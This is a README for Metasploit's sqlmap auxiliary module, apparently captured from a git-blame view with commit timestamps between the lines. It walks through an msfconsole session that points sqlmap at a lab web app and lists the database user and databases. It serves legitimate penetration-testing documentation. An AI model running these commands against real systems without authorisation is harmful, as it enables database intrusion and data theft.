2008-10-15 19:38:22 +04:00
|
|
|
To use Metasploit's sqlmap auxiliary module launch msfconsole and follow
|
2008-10-20 17:43:18 +04:00
|
|
|
the example below.
|
|
|
|
|
|
|
|
Note that if you are willing to run Metasploit's sqlmap auxiliary module on
|
2008-12-12 22:06:31 +03:00
|
|
|
through WMAP framework you first need to install sqlmap on your system or
|
|
|
|
add its file system path to the PATH environment variable.
|
|
|
|
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
$ ./msfconsole
|
|
|
|
|
|
|
|
_ _ _ _
|
|
|
|
| | | | (_) |
|
|
|
|
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
|
|
|
|
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
|
|
|
|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|
|
|
|
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
|
|
|
|
| |
|
|
|
|
|_|
|
|
|
|
|
|
|
|
|
|
|
|
=[ msf v3.2-testing
|
|
|
|
+ -- --=[ 308 exploits - 173 payloads
|
|
|
|
+ -- --=[ 20 encoders - 6 nops
|
|
|
|
=[ 75 aux
|
|
|
|
|
|
|
|
msf > use auxiliary/scanner/http/wmap_sqlmap
|
|
|
|
msf auxiliary(wmap_sqlmap) > set RHOSTS 192.168.1.121
|
|
|
|
RHOSTS => 192.168.1.121
|
|
|
|
msf auxiliary(wmap_sqlmap) > set PATH /sqlmap/mysql/get_int.php
|
|
|
|
PATH => /sqlmap/mysql/get_int.php
|
|
|
|
msf auxiliary(wmap_sqlmap) > set QUERY id=1
|
|
|
|
QUERY => id=1
|
|
|
|
msf auxiliary(wmap_sqlmap) > set OPTS '--dbs --current-user'
|
|
|
|
OPTS => --dbs --current-user
|
|
|
|
msf auxiliary(wmap_sqlmap) > set SQLMAP_PATH /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py
|
|
|
|
msf auxiliary(wmap_sqlmap) > show options
|
|
|
|
|
|
|
|
Module options:
|
|
|
|
|
2008-10-17 19:26:43 +04:00
|
|
|
Name Current Setting Required Description
|
|
|
|
---- --------------- -------- -----------
|
|
|
|
BATCH true yes Never ask for user input, use the default behaviour
|
|
|
|
BODY no The data string to be sent through POST
|
|
|
|
METHOD GET yes HTTP Method
|
|
|
|
OPTS --dbs --current-user no The sqlmap options to use
|
|
|
|
PATH /sqlmap/mysql/get_int.php yes The path/file to test for SQL injection
|
|
|
|
Proxies no Use a proxy chain
|
|
|
|
QUERY id=1 no HTTP GET query
|
|
|
|
RHOSTS 192.168.1.121 yes The target address range or CIDR identifier
|
|
|
|
RPORT 80 yes The target port
|
|
|
|
SQLMAP_PATH /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py yes The sqlmap >= 0.6.1 full path
|
|
|
|
SSL false no Use SSL
|
|
|
|
THREADS 1 yes The number of concurrent threads
|
|
|
|
VHOST no HTTP server virtual host
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
msf auxiliary(wmap_sqlmap) > run
|
2008-10-17 19:26:43 +04:00
|
|
|
[*] exec: /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py -u 'http://192.168.1.121:80//sqlmap/mysql/get_int.php?id=1' --method GET --dbs --current-user --batch
|
2008-10-15 19:38:22 +04:00
|
|
|
SQLMAP:
|
|
|
|
SQLMAP: sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
|
|
SQLMAP: and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
|
|
SQLMAP:
|
2008-10-17 19:26:43 +04:00
|
|
|
SQLMAP: [*] starting at: 16:23:19
|
2008-10-15 19:38:22 +04:00
|
|
|
SQLMAP:
|
2008-10-17 19:26:43 +04:00
|
|
|
SQLMAP: [16:23:20] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
|
2008-10-15 19:38:22 +04:00
|
|
|
SQLMAP: back-end DBMS: MySQL >= 5.0.0
|
|
|
|
SQLMAP:
|
|
|
|
SQLMAP: current user: 'testuser@localhost'
|
|
|
|
SQLMAP:
|
2008-10-17 19:26:43 +04:00
|
|
|
SQLMAP: available databases [3]:
|
2008-10-15 19:38:22 +04:00
|
|
|
SQLMAP: [*] information_schema
|
|
|
|
SQLMAP: [*] mysql
|
|
|
|
SQLMAP: [*] test
|
|
|
|
SQLMAP:
|
|
|
|
SQLMAP:
|
2008-10-17 19:26:43 +04:00
|
|
|
SQLMAP: [*] shutting down at: 16:23:21
|
2008-10-15 19:38:22 +04:00
|
|
|
SQLMAP:
|
|
|
|
[*] Auxiliary module execution completed
|
|
|
|
msf auxiliary(wmap_sqlmap) >
|
2009-01-13 02:59:07 +03:00
|
|
|
|
|
|
|
|
|
|
|
Happy hacking!
|
|
|
|
Bernardo Damele A. G. <bernardo.damele@gmail.com>
|